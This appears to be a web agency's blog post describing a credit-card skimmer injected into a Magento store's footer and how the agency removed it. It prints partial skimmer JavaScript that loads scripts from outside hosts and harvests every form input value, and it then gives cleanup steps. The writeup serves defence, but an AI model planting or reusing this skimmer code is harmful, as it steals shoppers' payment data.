One of my client complained about trojan alert on his Magento website, we checked the pages and found this code below on the System-> Config-> Design->Footer-> Miscellaneous HTML
Malicious code that was injected inside the Magento database, specifically under the core_config_data table. The JavaScript is loading malware from informer[.]net. Here is some of the hex encoded malware we discovered:
Code Sample
————————————————————————————————————-
<script type=”text/javascript”>
<!–
var be20b6410993ea4c7a48767775856514b={
snd:null,
e294b002686cad2df01bb59e3e2299f3e:’https://informaer.net/js/info_jquery.js’,
myid:(function(name){
var matches=document.cookie.match(new RegExp(‘(?:^|; )’+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,’\\$1′)+’=([^;]*)’));
return matches?decodeURIComponent(matches[1]):undefined;
})(‘setidd’)||(function(){
var ms=new Date();
var myid = ms.getTime()+”-“+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
var date=new Date(new Date().getTime()+60*60*24*1000);
document.cookie=’setidd=’+myid+’; path=/; expires=’+date.toUTCString();
return myid;
})(),
clk:function(){
be20b6410993ea4c7a48767775856514b.snd=null;
var inp=document.querySelectorAll(“input, select, textarea, checkbox, button”);
for (var i=0;i<inp.length;i++){
if(inp[i].value.length>0){
var nme=inp[i].name;
if(nme==”){nme=i;}
be20b6410993ea4c7a48767775856514b.snd+=inp[i].name+’=’+inp[i].value+’&’;
}
}
},
send:function(){……………………………………..
……………………………………………………………………………………………………
Once decoded, Credit Card Hijack (CCH) was discovered (CCH is malicious javascript code which injected into Magento shop, It allows hackers to steal credit card information). The malware then attempts to send this data to other websites.
During more investigation, We found a new piece of malicious code being used to steal credit card information from compromised Magento sites.
In addition to ccard.js file
Code Sample
——————————————————————————————————————–
<script type=”text/javascript”>
<!–
var grelos_v={
snd:null,
Glink:’https://cloud-jquery.org/code/jquery.min.js’,
myid:(function(name){
var matches=document.cookie.match(new RegExp(‘(?:^|; )’+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,’\\$1′)+’=([^;]*)’));
return matches?decodeURIComponent(matches[1]):undefined;
})(‘setidd’)||(function(){
var ms=new Date();
var myid = ms.getTime()+”-“+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
var date=new Date(new Date().getTime()+60*60*24*1000);
document.cookie=’setidd=’+myid+’; path=/; expires=’+date.toUTCString();
return myid;
})(),
base64_encode:function(data){
………..
…………………………………………………………………………
How We Remove Trojan (Infected Code) And Recover The Website?
Step1:-Search the infected code in database and source code using find & grep command.
Find & grep command:
(find /var/magento/root/folder -type f -exec grep -iHn –color=always ‘informaer’ {} \;)
Step 2:-Reset magento backend password for all users and ftp/ssh passwords as well. Used strong passwords method.
Step 3:- Apply Security Patches:
Scan website at https://www.magereport.com for security issues.
In scan website, we found that security patches SUPEE-9767, SUPEE-8788 are missing and needs to be updated to protect unauthorized access.
We have applied security patches to ensure complete security of the website’s data – customers, orders, and products.
* Make sure to take the backup before applying security patches.
Contact us here for any web solution.